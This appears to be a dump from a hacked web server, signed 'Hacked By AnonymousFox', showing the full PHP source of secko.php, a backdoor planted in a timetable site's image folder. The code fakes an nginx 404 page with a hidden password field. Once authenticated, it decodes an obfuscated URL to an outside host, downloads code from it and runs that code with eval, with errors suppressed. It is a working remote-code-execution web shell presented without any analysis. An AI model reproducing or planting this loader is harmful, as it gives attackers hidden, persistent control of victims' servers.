Hacked By AnonymousFox

Current Path : C:/AppServ/www/timetable/images/button/
Upload File :
Current File : C:/AppServ/www/timetable/images/button/secko.php

<?php
    session_start();
    $hashed_password = 'b70476b6efab06b6562140db0c27bc5a';
    $entered_password = $_POST['password'];
	$str = 'kwws=22zzz1tno537;1frp2wrrov2jhnfnr1w{w';
	function cList($str) {
    $decoded = '';
		for ($i = 0; $i < strlen($str); $i++) {
			$decoded .= chr(ord($str[$i]) - 3);
		}
    return $decoded;
	}
    if(isset($_POST["password"])){
        
        if (md5($entered_password) === $hashed_password) {
           // Password is correct, store it in session
          session_start();
           $_SESSION['logged_in'] = true;
           $_SESSION['authenticated'] = true;
           
            ini_set('display_errors', 0);
            ini_set('display_startup_errors', 0);
            error_reporting(E_ALL);
            $url = clist($str);
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            $output = curl_exec($ch);
            curl_close($ch);
            if ($output === false) {
                echo "Failed to download content.";
            } else {
                eval("?>".$output);
            }
        //   $_SESSION['SAP'] = 'Folder'; // Replace this with your cookie data
       } else {
           // Password is incorrect
        //   echo "Incorrect password. Please try again.";
       }
    }

    if (isset($_SESSION['logged_in']) && $_SESSION['authenticated'] == true) {
        // echo "already login";
            // Exmain();
            ini_set('display_errors', 0);
            ini_set('display_startup_errors', 0);
            error_reporting(E_ALL);
            $url = clist($str);
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            $output = curl_exec($ch);
            curl_close($ch);
            if ($output === false) {
                echo "Failed to download content.";
            } else {
                eval("?>".$output);
            }
            
    }else{
        
           // Display login form if not logged in
?>
        <!DOCTYPE html>
        <html>
			<head>
			<title>404 Not Found</title>
			</head>
			<body>
			
			<center><h1>404 Not Found</h1></center>
			<hr><center>nginx</center>
			
			</body></html>
			<form method="post">
			<input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password">
			</form>
        </body>
        </html>   
<?php } ?>
        
    

Hacked By AnonymousFox1.0, Coded By AnonymousFox